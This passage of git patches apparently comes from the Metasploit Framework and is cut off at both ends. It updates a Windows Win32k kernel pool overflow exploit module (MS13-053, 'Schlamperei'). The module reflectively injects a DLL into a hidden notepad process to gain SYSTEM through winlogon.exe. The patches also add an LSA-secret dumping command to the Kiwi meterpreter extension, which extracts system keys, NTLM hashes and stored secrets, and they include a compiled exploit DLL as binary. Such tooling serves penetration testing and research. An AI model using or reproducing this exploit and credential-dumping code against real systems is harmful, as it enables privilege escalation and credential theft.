= preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/cve-2013-1300/dllmain.cpp b/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp similarity index 94% rename from external/source/exploits/cve-2013-1300/dllmain.cpp rename to external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp index c103e0cc26..f87ad889ae 100644 --- a/external/source/exploits/cve-2013-1300/dllmain.cpp +++ b/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.cpp @@ -7,13 +7,16 @@ * found and exploited by nils and jon of @mwrlabs */ - #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN -#include "ReflectiveLoader.c" +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" + // Purloined from ntstatus.h #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth +#define WIN32_NO_STATUS +#include +#undef WIN32_NO_STATUS #ifndef _NTDEF_ typedef __success(return >= 0) LONG NTSTATUS; diff --git a/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj b/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj new file mode 100755 index 0000000000..93f23165d9 --- /dev/null +++ b/external/source/exploits/cve-2013-1300/cve-2013-1300/cve-2013-1300.vcxproj @@ -0,0 +1,96 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + + {C093C490-61BF-433E-AEB4-80753B20DEC7} + Win32Proj + Schlamperei_DLL + + + + DynamicLibrary + true + Unicode + + + DynamicLibrary + false + true + Unicode + + + + + + + + + + + + + ../../../ReflectiveDLLInjection/common;$(IncludePath) + false + + + ../../../ReflectiveDLLInjection/common;$(IncludePath) + false + + + + Use + Level3 + Disabled + WIN32;_DEBUG;_WINDOWS;_USRDLL;SCHLAMPEREI_DLL_EXPORTS;%(PreprocessorDefinitions) + + + Windows + true + + + + + Level3 + Use + MaxSpeed + true + true + WIN32;NDEBUG;_WINDOWS;_USRDLL;SCHLAMPEREI_DLL_EXPORTS;%(PreprocessorDefinitions) + MultiThreaded + + + Windows + true + true + true + + + + + false + NotUsing + false + NotUsing + + + + + + + + + + + + + + diff --git a/external/source/exploits/cve-2013-1300/make.msbuild b/external/source/exploits/cve-2013-1300/make.msbuild new file mode 100644 index 0000000000..c18153ec01 --- /dev/null +++ b/external/source/exploits/cve-2013-1300/make.msbuild @@ -0,0 +1,17 @@ + + + + .\cve-2013-1300.sln + + + + + + + + + + + + + diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat index a7893e8d85..38caa762c4 100755 --- a/external/source/exploits/make.bat +++ b/external/source/exploits/make.bat @@ -47,6 +47,13 @@ IF "%ERRORLEVEL%"=="0" ( POPD ) +IF "%ERRORLEVEL%"=="0" ( + ECHO "Building CVE-2013-1300 (schlamperei)" + PUSHD CVE-2013-1300 + msbuild.exe make.msbuild /target:%PLAT% + POPD +) + IF "%ERRORLEVEL%"=="0" ( ECHO "Building bypassuac (on-disk)" PUSHD bypassuac diff --git a/modules/exploits/windows/local/ms13_058_schlamperei.rb b/modules/exploits/windows/local/ms13_053_schlamperei.rb similarity index 74% rename from modules/exploits/windows/local/ms13_058_schlamperei.rb rename to modules/exploits/windows/local/ms13_053_schlamperei.rb index 9deaf504e2..cc072c3a6c 100644 --- a/modules/exploits/windows/local/ms13_058_schlamperei.rb +++ b/modules/exploits/windows/local/ms13_053_schlamperei.rb @@ -18,16 +18,21 @@ class Metasploit3 < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - 'Name' => 'ms13_053_schlamperei', + 'Name' => 'Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)', 'Description' => %q{ - A kernel pool overflow in Win32k which allows local privilege escalation. Used in pwn2own 2013 to break out of chrome's sandbox. + A kernel pool overflow in Win32k which allows local privilege escalation. + The kernel shellcode nulls the ACL for the winlogon.exe process (a SYSTEM process). + This allows any unprivileged process to freely migrate to winlogon.exe, achieving + privilege escalation. Used in pwn2own 2013 by MWR to break out of chrome's sandbox. + NOTE: when you exit the meterpreter session, winlogon.exe is lickely to crash. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Nils&Jon (MWR) - original exploit', - 'Donato Capitella - ported to metasploit', - 'Ben Campbell - ported to metasploit' + 'Nils', #Original Exploit + 'Jon', #Original Exploit + 'Donato Capitella ', # Metasploit Conversion + 'Ben Campbell ' # Help and Encouragement ;) ], 'Arch' => ARCH_X86, 'Platform' => 'win', @@ -58,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Local def check os = sysinfo["OS"] - if (os =~ /windows/i) == nil + unless (os =~ /windows/i) return Exploit::CheckCode::Unknown end @@ -70,7 +75,11 @@ class Metasploit3 < Msf::Exploit::Local when 7600 return Exploit::CheckCode::Vulnerable when 7601 - return Exploit::CheckCode::Vulnerable if revision <= 1800 + if branch == 18 + return Exploit::CheckCode::Vulnerable if revision < 18176 + else + return Exploit::CheckCode::Vulnerable if revision < 22348 + end end return Exploit::CheckCode::Unknown end @@ -87,14 +96,14 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported") end - if check != Exploit::CheckCode::Vulnerable - fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.") + unless check == Exploit::CheckCode::Vulnerable + fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system") end print_status("Launching notepad to host the exploit...") - notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true}) + notepad_process_pid = cmd_exec_get_pid("notepad.exe") begin - process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) + process = client.sys.process.open(notepad_process_pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") rescue Rex::Post::Meterpreter::RequestError print_status("Operation failed. Trying to elevate the current process...") @@ -102,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Local end print_status("Reflectively injecting the exploit DLL into #{process.pid}...") - library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "schlamperei.dll") + library_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2013-1300", "cve-2013-1300.dll") library_path = ::File.expand_path(library_path) print_status("Injecting exploit into #{process.pid}...") @@ -110,9 +119,9 @@ class Metasploit3 < Msf::Exploit::Local thread = process.thread.create(exploit_mem + offset) client.railgun.kernel32.WaitForSingleObject(thread.handle, 5000) - - processes = client.sys.process.get_processes - processes.each do |p| + + + client.sys.process.each_process do |p| if p['name'] == "winlogon.exe" winlogon_pid = p['pid'] print_status("Found winlogon.exe with PID #{winlogon_pid}") From a9758413c0dd7f12fb5959d0e4077deb11789406 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 14 Mar 2014 19:50:01 +1000 Subject: [PATCH 061/853] Add lsa secret dumps plus other tweaks --- .../post/meterpreter/extensions/kiwi/kiwi.rb | 76 ++++++++++++++++++- .../post/meterpreter/extensions/kiwi/tlv.rb | 48 ++++++++---- .../ui/console/command_dispatcher/kiwi.rb | 42 +++++++++- 3 files changed, 147 insertions(+), 19 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb index 344ee25912..e50b6aa728 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/kiwi.rb @@ -43,6 +43,46 @@ class Kiwi < Extension ]) end + def lsa_dump + request = Packet.create_request('kiwi_lsa_dump_secrets') + + response = client.send_request(request) + + result = { + :major => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MAJ), + :minor => response.get_tlv_value(TLV_TYPE_KIWI_LSA_VER_MIN), + :compname => response.get_tlv_value(TLV_TYPE_KIWI_LSA_COMPNAME), + :syskey => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_SYSKEY)), + :nt5key => to_hex_string(response.get_tlv_value(TLV_TYPE_KIWI_LSA_NT5KEY)), + :nt6keys => [], + :secrets => [] + } + + response.each(TLV_TYPE_KIWI_LSA_NT6KEY) do |k| + result[:nt6keys] << { + :id => to_guid(k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYID)), + :value => to_hex_string(k.get_tlv_value(TLV_TYPE_KIWI_LSA_KEYVALUE)) + } + end + + response.each(TLV_TYPE_KIWI_LSA_SECRET) do |s| + r = { + :name => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NAME), + :service => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_SERV), + :ntlm => to_hex_string(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_NTLM)), + :current => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR), + :old => s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD) + } + + r[:current] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW)) + r[:old] ||= to_hex_dump(s.get_tlv_value(TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW)) + + result[:secrets] << r + end + + return result + end + def golden_ticket_use(ticket) request = Packet.create_request('kiwi_golden_ticket_use') request.add_tlv(TLV_TYPE_KIWI_GOLD_TICKET, ticket, false, true) @@ -73,10 +113,10 @@ class Kiwi < Extension :username => r.get_tlv_value(TLV_TYPE_KIWI_PWD_USERNAME), :domain => r.get_tlv_value(TLV_TYPE_KIWI_PWD_DOMAIN), :password => r.get_tlv_value(TLV_TYPE_KIWI_PWD_PASSWORD), - :auth_hi => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_HI), - :auth_lo => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_LO), - :lm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH), - :ntlm => r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH) + :auth_hi => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_HI), + :auth_lo => r.get_tlv_value(TLV_TYPE_KIWI_PWD_AUTH_LO), + :lm => to_hex_string(r.get_tlv_value(TLV_TYPE_KIWI_PWD_LMHASH)), + :ntlm => to_hex_string(r.get_tlv_value(TLV_TYPE_KIWI_PWD_NTLMHASH)) } end @@ -110,6 +150,34 @@ class Kiwi < Extension def kerberos return scrape_passwords(PWD_ID_SEK_KERBEROS) end + +protected + + def to_hex_dump(bytes) + return nil unless bytes + + bytes.each_byte.map { |b| + b.to_s(16).rjust(2, '0') + }.join(' ') + end + + def to_hex_string(bytes) + return nil unless bytes + bytes.unpack('H*')[0] + end + + def to_guid(bytes) + return nil unless bytes + s = bytes.unpack('H*')[0] + parts = [ + s[6, 2] + s[4, 2] + s[2, 2] + s[0, 2], + s[10, 2] + s[8, 2], + s[14, 2] + s[12, 2], + s[16, 4], + s[20, 12] + ] + "{#{parts.join('-')}}" + end end end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb index 46efabf911..4011729986 100644 --- a/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/kiwi/tlv.rb @@ -5,21 +5,41 @@ module Meterpreter module Extensions module Kiwi -TLV_TYPE_KIWI_PWD_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1) -TLV_TYPE_KIWI_PWD_RESULT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 2) -TLV_TYPE_KIWI_PWD_USERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) -TLV_TYPE_KIWI_PWD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4) -TLV_TYPE_KIWI_PWD_PASSWORD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5) -TLV_TYPE_KIWI_PWD_AUTH_HI = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 6) -TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 7) -TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 8) -TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9) +TLV_TYPE_KIWI_PWD_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 1) +TLV_TYPE_KIWI_PWD_RESULT = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 2) +TLV_TYPE_KIWI_PWD_USERNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) +TLV_TYPE_KIWI_PWD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4) +TLV_TYPE_KIWI_PWD_PASSWORD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 5) +TLV_TYPE_KIWI_PWD_AUTH_HI = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 6) +TLV_TYPE_KIWI_PWD_AUTH_LO = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 7) +TLV_TYPE_KIWI_PWD_LMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 8) +TLV_TYPE_KIWI_PWD_NTLMHASH = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9) -TLV_TYPE_KIWI_GOLD_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10) -TLV_TYPE_KIWI_GOLD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11) -TLV_TYPE_KIWI_GOLD_SID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12) -TLV_TYPE_KIWI_GOLD_TGT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13) -TLV_TYPE_KIWI_GOLD_TICKET = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 14) +TLV_TYPE_KIWI_GOLD_USER = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10) +TLV_TYPE_KIWI_GOLD_DOMAIN = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 11) +TLV_TYPE_KIWI_GOLD_SID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 12) +TLV_TYPE_KIWI_GOLD_TGT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 13) +TLV_TYPE_KIWI_GOLD_TICKET = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 14) + +TLV_TYPE_KIWI_LSA_VER_MAJ = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 15) +TLV_TYPE_KIWI_LSA_VER_MIN = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 16) +TLV_TYPE_KIWI_LSA_COMPNAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 17) +TLV_TYPE_KIWI_LSA_SYSKEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 18) +TLV_TYPE_KIWI_LSA_KEYCOUNT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 19) +TLV_TYPE_KIWI_LSA_KEYID = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 20) +TLV_TYPE_KIWI_LSA_KEYIDX = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 21) +TLV_TYPE_KIWI_LSA_KEYVALUE = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 22) +TLV_TYPE_KIWI_LSA_NT6KEY = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 23) +TLV_TYPE_KIWI_LSA_NT5KEY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 24) + +TLV_TYPE_KIWI_LSA_SECRET = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 25) +TLV_TYPE_KIWI_LSA_SECRET_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 26) +TLV_TYPE_KIWI_LSA_SECRET_SERV = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 27) +TLV_TYPE_KIWI_LSA_SECRET_NTLM = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 28) +TLV_TYPE_KIWI_LSA_SECRET_CURR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 29) +TLV_TYPE_KIWI_LSA_SECRET_CURR_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 30) +TLV_TYPE_KIWI_LSA_SECRET_OLD = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 31) +TLV_TYPE_KIWI_LSA_SECRET_OLD_RAW = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 32) end end diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index 39f6be508f..2b6aaa49fd 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb @@ -45,7 +45,8 @@ class Console::CommandDispatcher::Kiwi "creds_kerberos" => "Attempt to retrieve Kerberos creds", "creds_all" => "Attempt to retrieve all credentials", "golden_ticket_create" => "Attempt to create a golden kerberos ticket", - "golden_ticket_use" => "Attempt to use a golden kerberos ticket" + "golden_ticket_use" => "Attempt to use a golden kerberos ticket", + "lsa_dump" => "Attempt to dump LSA secrets" } end @@ -79,6 +80,45 @@ class Console::CommandDispatcher::Kiwi return true end + def cmd_lsa_dump(*args) + get_privs + + print_status("Dumping LSA secrets") + lsa = client.kiwi.lsa_dump + + # the format of this data doesn't really lend itself nicely to + # use within a table so instead we'll dump in a linear fashion + + print_line("Policy Subsystem : #{lsa[:major]}.#{lsa[:minor]}") if lsa[:major] + print_line("Domain/Computer : #{lsa[:compname]}") if lsa[:compname] + print_line("System Key : #{lsa[:syskey]}") if lsa[:syskey] + print_line("NT5 Key : #{lsa[:nt5key]}") if lsa[:nt5key] + print_line + print_line("NT6 Key Count : #{lsa[:nt6keys].length}") + + if lsa[:nt6keys].length > 0 + print_line + lsa[:nt6keys].to_enum.with_index(1) do |k, i| + print_line("#{i.to_s.rjust(2, ' ')}. ID : #{k[:id]}") + print_line("#{i.to_s.rjust(2, ' ')}. Value : #{k[:value]}") + end + end + + print_line + print_line("Secret Count : #{lsa[:secrets].length}") + if lsa[:secrets].length > 0 + lsa[:secrets].to_enum.with_index(1) do |s, i| + print_line + print_line("#{i.to_s.rjust(2, ' ')}. Name : #{s[:name]}") + print_line("#{i.to_s.rjust(2, ' ')}. Service : #{s[:service]}") if s[:service] + print_line("#{i.to_s.rjust(2, ' ')}. NTLM : #{s[:ntlm]}") if s[:ntlm] + print_line("#{i.to_s.rjust(2, ' ')}. Current : #{s[:current]}") if s[:current] + print_line("#{i.to_s.rjust(2, ' ')}. Old : #{s[:old]}") if s[:old] + end + end + print_line + end + def cmd_golden_ticket_create(*args) if args.length != 5 print_line("Usage: golden_ticket_create user domain sid tgt ticketpath") From 409787346e11b9d9a211d2fa1223056286207fcc Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 12 Mar 2014 21:51:11 +1000 Subject: [PATCH 062/853] Bring build tools up to date, change some project settings This commit brings the source into line with the general format/settings that are used in other exploits. --- .../cve-2013-1300/schlamperei.x86.dll | Bin 0 -> 72192 bytes .../exploits/cve-2013-1300/cve-2013-1300.sln | 8 +++--- .../schlamperei.c} | 24 +++++++++--------- .../schlamperei.vcxproj} | 23 ++++++++++++++--- .../windows/local/ms13_053_schlamperei.rb | 15 ++++++----- 5 files changed, 44 insertions(+), 26 deletions(-) create mode 100755 data/exploits/cve-2013-1300/schlamperei.x86.dll rename external/source/exploits/cve-2013-1300/{cve-2013-1300/cve-2013-1300.cpp => schlamperei/schlamperei.c} (91%) mode change 100644 => 100755 rename external/source/exploits/cve-2013-1300/{cve-2013-1300/cve-2013-1300.vcxproj => schlamperei/schlamperei.vcxproj} (80%) diff --git a/data/exploits/cve-2013-1300/schlamperei.x86.dll b/data/exploits/cve-2013-1300/schlamperei.x86.dll new file mode 100755 index 0000000000000000000000000000000000000000..d4910ae3e8c6c9b82bff894843b2f79d77aac46f GIT binary patch literal 72192 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 